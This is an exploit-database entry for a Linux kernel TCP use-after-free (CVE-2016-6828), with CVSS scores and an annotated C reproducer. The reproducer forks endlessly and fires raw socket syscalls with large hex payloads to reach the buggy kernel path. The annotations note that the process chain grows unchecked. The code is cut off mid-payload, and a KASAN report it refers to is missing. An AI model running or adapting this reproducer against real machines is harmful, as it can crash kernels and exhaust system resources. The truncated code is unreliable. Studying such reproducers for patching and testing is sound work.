exploitpack · Marco Grassi · EXPLOITPACK:1FBD31E3DB245782B704F7FD19F38A9F

Linux Kernel - TCP Related Read Use-After-Free

2016-08-18 00:00:00
Marco Grassi

5.5 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

4.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:N/I:N/A:C

Linux Kernel - TCP Related Read Use-After-Free

// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html

// To build: clang derp4.c -o derp4 -static

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>

#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif

// Return values of the child's raw syscalls, one slot per generated call.
// Only a sparse subset of the 62 slots is written (0, 1, 3, 4, 7, 9, 10, 12,
// 47, 51, 53, 54, 61); the numbering looks like a fuzzer-generated reproducer
// (presumably syzkaller) that was pasted as-is, and nothing reads the values.
long r[62];


// Reproducer entry point. Forks forever; each child replays a fixed sequence
// of raw syscalls (fixed-address anonymous mappings, one AF_INET6 TCP socket,
// a handful of sends on it) while the parent waits for it and prints
// "collected child". No return value is checked anywhere: the sequence only
// exists to reach the kernel path shown in the KASAN report below.
// argc/argv are unused.
//
// NOTE(review): fork() comes from <unistd.h>, but waitpid() needs
// <sys/wait.h> and exit() needs <stdlib.h>; neither header is included, so
// the file relies on implicit declarations, which current clang rejects by
// default.
//
// NOTE(review): the child never exits after its last syscall (the write()
// into r[61]). It falls out of the if/else, continues the while (1) and forks
// a child of its own, so the process chain grows one level per iteration
// until fork() fails (the "fork failed" branch). Whether the lingering
// children and their still-open sockets matter for the race is not evident
// from this code — confirm against the linked source before adding a _exit().
//
// The raw stores below cast integer addresses to pointers and several are
// misaligned (e.g. the uint32_t at 0x20001fff); that is undefined behaviour
// in C and only works because x86-64 tolerates unaligned access.
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();

        if (pid == 0) {
        // Child. First fixed mapping: 0x20000 bytes at 0x20000000, prot 0x3
        // (PROT_READ|PROT_WRITE), flags 0x32
        // (MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS), fd -1. Every raw pointer
        // below lies in this region or in the two one-page mappings created
        // later at 0x20020000 and 0x20022000.
        r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        // socket(AF_INET6 = 0xa, SOCK_STREAM = 0x1, 0): an IPv6 TCP socket,
        // consistent with the tcp_v6_rcv frames in the KASAN trace.
        r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
        // 128-byte sockaddr for bind(); the leading 0a 00 is AF_INET6 in
        // little-endian, followed by a port, flow label and an address that
        // ends in ::1 (byte 23 is 0x01).
        memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
        r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
        // Second fixed mapping: one page at 0x20020000.
        r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        // 165 (0xa5) bytes of payload for the first sendto(). Its flags
        // argument 0x249e4e54fe149d8c is not a meaningful MSG_* combination
        // — presumably fuzzer noise left in place.
        memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);
        // 28-byte destination (sizeof(struct sockaddr_in6)), AF_INET6, again
        // an address ending in ::1.
        memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
        r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
        // setsockopt(fd, SOL_SOCKET = 1, SO_RCVBUF = 8, &2, 4): request a
        // tiny receive buffer.
        *(uint32_t*)0x20001fff = (uint32_t)0x2;
        r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
        // A second descriptor for the same socket; the rest of the sequence
        // uses r[10].
        r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
        // setsockopt(fd, SOL_IPV6 = 0x29, option 0xb, &4, 4). Option 11 is
        // presumably IPV6_FLOWINFO — verify against <linux/in6.h>.
        *(uint32_t*)0x20018000 = (uint32_t)0x4;
        r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);
        // struct msghdr at 0x2000dfc8, written at the x86-64 field offsets:
        // msg_name = 0x2000e000, msg_namelen = 0xc, msg_iov = 0x20000000,
        // msg_iovlen = 1, msg_control = NULL, msg_controllen = 0,
        // msg_flags = 4.
        *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
        *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
        *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
        *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
        *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
        *(uint64_t*)0x2000dff0 = (uint64_t)0x0;
        *(uint32_t*)0x2000dff8 = (uint32_t)0x4;
        // The 12-byte msg_name: family 0, port 0, then 0xffff and 0x401.
        *(uint16_t*)0x2000e000 = (uint16_t)0x0;
        *(uint16_t*)0x2000e002 = (uint16_t)0x0;
        *(uint32_t*)0x2000e004 = (uint32_t)0xffff;
        *(uint32_t*)0x2000e008 = (uint32_t)0x401;
        // One iovec at 0x20000000: base 0x2000ed3a, len 0x37 (55 bytes).
        *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
        *(uint64_t*)0x20000008 = (uint64_t)0x37;
        // The 55-byte payload, written field by field. Two stores truncate
        // silently: (uint8_t)0x100 at 0x2000ed4b stores 0, and
        // (uint32_t)0xffffffffffffffff at 0x2000ed6a stores 0xffffffff.
        *(uint32_t*)0x2000ed3a = (uint32_t)0x14;
        *(uint16_t*)0x2000ed3e = (uint16_t)0x2;
        *(uint16_t*)0x2000ed40 = (uint16_t)0x12;
        *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
        *(uint32_t*)0x2000ed46 = (uint32_t)0x7;
        *(uint8_t*)0x2000ed4a = (uint8_t)0x6;
        *(uint8_t*)0x2000ed4b = (uint8_t)0x100;
        *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
        *(uint32_t*)0x2000ed4d = (uint32_t)0x11;
        *(uint16_t*)0x2000ed51 = (uint16_t)0x0;
        *(uint16_t*)0x2000ed53 = (uint16_t)0x808;
        *(uint32_t*)0x2000ed55 = (uint32_t)0x1;
        *(uint32_t*)0x2000ed59 = (uint32_t)0x0;
        *(uint8_t*)0x2000ed5d = (uint8_t)0x0;
        *(uint32_t*)0x2000ed5e = (uint32_t)0x12;
        *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
        *(uint16_t*)0x2000ed64 = (uint16_t)0x200;
        *(uint32_t*)0x2000ed66 = (uint32_t)0x5;
        *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
        *(uint8_t*)0x2000ed6e = (uint8_t)0x9;
        *(uint8_t*)0x2000ed6f = (uint8_t)0x1;
        // sendmsg() on the dup'd fd with flags 0x801 (MSG_OOB | MSG_CONFIRM).
        r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
        // recvfrom(): up to 0xde bytes into 0x20014a91, source address at
        // 0x20000ffb. The addrlen argument is the literal 0x8 rather than a
        // pointer to a socklen_t, so this call presumably fails with EFAULT;
        // nothing depends on its result.
        *(uint16_t*)0x20001003 = (uint16_t)0x1;
        *(uint8_t*)0x20001005 = (uint8_t)0x0;
        *(uint32_t*)0x20001007 = (uint32_t)0x9;
        r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);
        // One page (4096 bytes) of payload, followed by a sendto() of it on
        // the dup'd fd with flags 0xc080 (MSG_EOR | MSG_NOSIGNAL | MSG_MORE)
        // and no destination address.
        memcpy((void*)0x20015285, "\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x81\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\
xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x39\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\
x33\x4c\x1e\x72\xe9\x00\x1a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a\x56\xe1\x59\x92\x1f\x5f\xea\x61\x1b\xe3\x2f\xc0\x15\x9c\x3e\xcf\xe7\x05\xbc\x7e\xe8\x88\x58\x63\x29\xc5\x10\x26\xf0\xbc\xf5\xcd\x3d\x33\xfa\x87\x45\x25\x1d\x86\xc0\xd8\x72\xdc\x1b\xaf\xa1\xf3\x1e\x81\xb4\x7b\x4d\xb5\x79\x72\x87\x92\x1f\x9d\xa1\x8e\x1a\x24\x7f\x49\x11\xc4\x59\xa5\x8e\x6c\x7a\xdd\x17\x52\x47\x3b\x09\x28\xe4\x3b\xef\xb0\xf3\x68\x9c\xd3\x6e\xe9\x89\x38\xdb\xeb\x01\x4f\x39\x9b\x5b\x0c\x8d\x92\xcd\x5c\x15\x47\x15\xa9\x98\x70\x75\xe2\xf0\x5b\xfe\xaa\xa9\xb3\xba\xc9\x8e\x5c\x6d\xfb\x53\xb9\x8b\x4f\x7e\x31\xbe\x69\x7e\x6d\x80\x6f\x3e\xd8\x59\x1c\x13\x5a\x3b\x2b\x0e\xc6\xd1\xf9\xaa\xf1\x30\x16\xf1\x7b\x2f\x6b\x5f\xa9\xde\xfa\xfd\x59\xaa\xdd\x32\xf7\xbb\x94\x28\x93\x16\xb3\x60\xd5\x6c\x62\x93\xba\xa9\xaa\x38\x52\xdc\x2f\x37\x75\x1d\x56\xa9\x3c\x7c\x8b\x0d\x56\x9e\x05\xf7\xa1\xa6\xef\x3c\x76\x6e\x06\x06\xde\x07\x84\xa0\xeb\xeb\x8e\x46\x2f\xd9\xc2\x56\xc6\x89\x85\x8c\x39\xad\xa2\x77\x24\xe5\xb5\x00\x04\x4c\xf5\x1e\x4a\x03\x06\xbb\xa1\x1f\xe7\xf8\xb7\x3e\xdd\xfc\x18\xbf\x13\x07\x14\xdd\x8a\x6b\x0f\x44\xc0\xeb\x4a\x43\x7d\x42\xe9\x02\x63\xb5\xc2\x7a\x87\xce\x14\x0c\xaf\xd9\x2b\xaf\x4b\x22\xec\xa9\x3b\x16\xeb\xb7\xc5\x0d\x51\x91\x93\x5d\x90\xe1\x8f\x34\x86\x71\xe0\x7c\xb5\x1e\xe7\x19\xc0\xd6\xc9\x3e\x08\x75\xc0\x1f\xab\x5e\x41\xbf\x0e\x1a\x14\xcc\x40\xf6\x85\x02\xba\x3d\x78\xce\xf7\x6f\x0e\xbf\x51\xda\xc6\xa1\x59\xbd\x69\x1a\x05\x7b\x34\xbd\xa7\x28\x39\xa1\xa2\x18\xa7\x76\x8f\x51\xa5\xd2\xdc\xf4\xa7\x7b\xc8\x64\x0e\xc0\xe8\xac\xc3\xd4\xb9\x11\x78\x58\x79\xe4\x91\xc9\xcf\xe2\x0c\xbb\x11\xb3\x80\x48\xd7\xa5\xbd\x45\xdd\xb6\xad\x87\x79\x01\xa0\xe1\x89\xdb\x54\x42\x1c\x78\x47\x91\x07\xe8\xbc\x26\x15\xf2\xdb\xba\x5b\xaa\x5a\x05\x84\xa2\x83\x7d\xe5\xbb\x5a\x77\x3f\x0a\x27\x06\x4e\x86\x69\x95\x27\x22\x7e\xa2\x42\x4d\x61\xa7\xab\x6d\x05\x8b\x7b\x6b\x94\xd6\x10\x40\x66\x30\x0b\x6c\x79\xe1\x62\xee\x33\xed\xd6\xd4\x9a\x3a\xea\x95\x5b\x60\x70\x58\xc9\xc6\x6c\x47\xa7\xd1\xcc\xfa\x9f\
xc7\x66\xac\xbb\x4f\xe4\x09\x74\xe3\xd1\xeb\x82\x3b\xce\x4c\x2b\xcf\x08\xcd\xf6\x96\x2b\x65\x2a\x2c\x33\xf5\x7b\x66\xdb\xec\x3d\xbf\x24\xf7\xf9\x87\x99\x26\x1b\x5a\xa0\xd0\x0e\x2f\xc0\x2e\x03\xcd\xf4\x1e\x10\x7c\xb5\xb7\xec\x75\x2c\x20\x89\xc4\xec\x61\x34\x3b\x6c\x68\x14\x95\xd9\x9a\x03\xd7\xf2\x6b\xe6\x50\x14\x80\x72\xa2\x67\xaf\xb3\x19\x12\xcc\xf9\x9d\x3d\x34\x86\x48\xe7\xa6\xe7\xc0\x9b\x6c\xeb\x2c\x0d\x26\x6f\x09\xd9\x8c\x92\x8e\xde\x80\x04\x14\xe6\x88\xbb\x39\x2f\x2c\x14\xf2\xda\x86\xdb\x10\x59\x54\x83\xe6\x5e\xe3\x14\x4b\x73\x97\x9a\x94\xa8\x09\x44\x1d\xd0\x62\x2d\x43\xb4\x5e\x38\xaa\x8e\x5b\xdd\x2f\xd3\x2c\x8e\xd3\xd0\x0f\x9d\x80\xca\x87\x4e\xab\x52\x01\x29\xb7\xe7\x55\xa2\xe4\x2d\xee\xce\x30\xe9\xcb\xc4\x3e\xf9\x58\x04\x63\x01\xec\x89\x33\x01\x26\x7d\xe2\x5d\x41\xf7\x91\xa3\xcb\x41\x62\xb4\x82\x6d\xb9\xd1\xad\xf2\x96\x0f\xad\x87\xbe\x6d\x95\xaf\xc2\x14\x12\x78\x10\x90\x86\x61\x55\x97\x77\x5c\x19\xfe\x4e\xda\xf3\x74\x08\x83\x4d\xa0\x25\x04\x05\x4b\xf3\x30\xc1\x2f\xb6\x16\x2d\x9b\x2c\x7d\x90\x5a\xd2\x28\x53\xc5\x3a\x14\x8c\x1f\xda\xd7\x36\x47\xdc\x85\x7f\x2b\xe8\x0d\xf9\x03\x92\xba\x82\x20\xde\xb3\x65\x14\xe8\xdd\xfe\x6b\x3a\xab\xd5\xad\x03\xcb\x4f\x41\x08\x97\x22\xe7\xc7\x1d\x0e\x7c\x8e\x4d\x12\x2c\x86\x8b\xb3\x31\x43\x5f\x6e\x37\xcf\x08\x83\x4d\x16\xd7\x3f\x4a\x80\x2b\x67\x1a\xbb\xaf\x8d\x1c\x1c\x5d\x00\x33\xf3\x67\x13\x43\xf1\x09\x00\x81\x68\xe1\x33\xb1\xb4\xc1\xad\xd9\x99\x0c\xac\x4f\x09\x26\xd7\xff\xc8\xcd\xfd\xe9\x32\x52\xd1\x4c\xee\x61\x89\xe0\x82\x64\xa3\x6b\xeb\x23\x87\xc8\xed\x94\xa6\x6b\x68\xec\x13\x59\xa7\x74\x06\x7d\xac\x6f\xfd\xf5\x3d\x3b\x9d\x8b\xe1\x22\x98\xf3\x0e\xbd\x3f\xfa\xbe\xb9\x86\x3d\xe4\x1f\x30\xd4\x96\x6f\x7f\xd4\x48\xbc\xc9\x8b\x1e\x8f\x63\xa1\xb4\xa9\x43\xf2\xb8\x28\x5e\x57\x93\xc5\x56\x21\x12\x20\xd5\x16\x29\x14\xb0\xff\x42\xba\x0e\x26\x6e\xcd\x7e\x7c\x72\x27\xfb\xd2\x0f\xac\xdb\x0d\xc8\xc8\xd6\xa0\xc7\x5b\xfd\x0c\xd7\x89\xe8\x8b\xee\x24\x0f\xd1\x78\x23\x82\xe7\xb5\x7f\x63\xb3\x14\x10\x78\x26\x23\xd3\x60\xbd\x53\x5a\x1b\x67\x0f\xcf\
xd5\xfe\x90\x18\xa9\xd6\x80\xc3\x94\x00\x21\x6d\xdb\xab\x09\x38\x0d\x77\xdc\x3e\x90\x2f\x3c\x0e\x06\x6b\xaf\x14\x45\xcc\x0d\xcb\x1b\x74\xdc\x01\xec\x29\x23\x96\xe0\x2a\x86\xee\x92\x9c\x86\x10\x9f\x3d\x7a\x56\xf3\x6f\x3b\xef\x2b\x84\xd5\xcf\xd3\xf7\x2b\xa6\x0d\x9c\xa2\xb0\x42\x8f\xed\x53\x99\x7a\x11\x64\x5e\x53\x92\xb7\x97\x20\xaa\x25\xc2\x5d\x6b\xbd\xde\x58\xe7\x51\xc2\xd5\xa5\xe0\x9b\xbf\xe4\x81\x1c\xd5\xc4\xee\x29\xfa\xd2\xbb\xce\xbf\xfe\x40\xee\x09\xf5\x4b\xb2\x1e\x33\xef\x8f\xf9\x05\x68\x15\x7a\x45\xa0\x52\x3c\x29\xf4\x01\xf2\x64\x98\x2d\xbd\x89\xae\x86\x80\xd9\x0a\xfe\xca\x86\x46\xc3\x58\xd6\x1d\x54\xd4\x6f\x36\xe0\x32\x6a\x23\x29\xbd\x69\x22\x9b\x1e\x7f\x01\x28\xff\xc0\x1c\x8f\x01\x08\xa4\x96\xda\xfe\x96\xab\xf2\x23\x34\x34\xb0\x46\x38\xd6\x2f\x87\x62\xcf\x96\x85\xbb\xcc\x98\x27\xfc\x91\xea\xd9\x78\xc4\xcb\x42\xc0\xd3\x7d\x90\x1c\xfa\x62\xa8\xb7\xf3\x31\x04\x56\xa1\x97\xe1\xa8\xfc\xab\x90\x64\x01\x81\xae\x20\x05\x2f\x91\xaf\x27\xb9\xb5\x12\xce\x94\xa6\x6b\x32\xf2\xd0\x0b\xf5\x71\xff\xbb\xd8\xe1\x20\x5f\x0d\xbe\x90\x44\xe4\xa5\xb5\xf6\xa3\x70\x5b\xd3\x24\xa2\xb6\xba\x22\xd7\x27\x47\xff\xff\x79\x65\xf1\x82\xcf\x51\x56\xa6\x6f\x48\x32\x66\x7b\x3f\x3f\x7c\xb8\x6f\x0f\x2d\xe8\x92\x72\x86\xc4\x9e\x6f\xe7\xb6\x3f\xb6\x6f\x96\xdc\x68\x8d\x1d\x1c\xfe\x3f\x23\x45\x7d\x35\xed\x3d\x6a\x06\xe8\x4b\x7f\xb1\xe6\x2b\x66\x4a\x53\x45\xa4\x5c\x77\x96\x25\x4a\x13\x3a\xf3\xbe\x7e\x16\xb0\x51\x84\x53\xe6\x4e\x37\xd7\xc1\xee\xda\xfb\x18\xb0\x81\x3b\x16\xfc\xea\x32\x00\x75\x97\x1a\xc9\xf9\x5a\x44\x1a\x12\x08\xcb\xbe\x60\x79\x80\x60\xcd\xbd\x5b\x60\x9b\xfc\x31\x5b\xca\xa5\xda\x16\x18\x45\x95\xe1\x5b\xd4\x4c\xdc\xc9\x10\x73\x14\xbb\x0b\x9c\xdb\x0c\x0c\x8c\x3b\x42\x29\xf4\x7d\x93\x61\x5a\x6a\x6b\xac\xae\x80\x60\x5d\xd1\x3e\xe4\x6d\xf7\x3f\xb8\x7b\x7f\x35\x1b\x67\xd3\x60\x80\x0a\x08\x25\xff\xbb\x31\x47\x60\xb3\xd1\x0e\xce\xbc\xf3\x88\xe0\x56\x5e\x61\x97\x63\x82\xa4\xff\xea\xf9\x48\x7f\x4c\x62\x58\x46\x30\xe5\x2c\xbe\xa0\x18\xe4\xe8\xf6\x4f\x22\x5b\x1d\x18\xb0\x48\x0c\xe7\x25\xa9\x1a\x8e\
x5a\x3f\xbd\x4c\xab\xe7\x52\x29\xa2\x35\x77\xf5\x0c\x8c\x4e\x2d\xa9\x16\x11\x00\xdf\x8b\xe1\x7f\x8f\x20\x9d\xe9\xea\x2b\x4e\xf4\xe5\x98\x4e\xf8\xe9\x5b\x98\xb9\x2a\xb8\x68\x0d\xdb\x35\xf8\xfd\x5d\x28\x14\x2a\x65\x33\x3d\xde\x77\xc5\x73\xee\xc4\xa4\x8e\x76\x12\x4f\x28\x93\x7d\xd8\xf5\xbf\x32\x39\xe1\xc1\xaa\x46\x71\x9f\xcb\xa4\x93\xa5\xae\xe0\xb1\x9f\x03\xb3\xbe\x86\xf9\x92\x45\x65\x64\x8d\xd9\x49\x09\xd2\x0c\x01\x92\x75\x1a\x29\x43\x34\x74\x21\x6d\xa6\x0e\xa7\x3b\x15\x2c\x59\xc2\xb9\x8a\x92\xcb\xc3\x8c\xc7\x06\xfd\xfc\xe1\x67\xc7\xc5\xc6\x07\x24\xc8\x06\xa7\xdc\x76\x83\x43\xec\x90\x3b\x6f\xa0\x00\x9a\x68\x44\x71\x19\xbe\xdb\x24\xb0\xcb\x9b\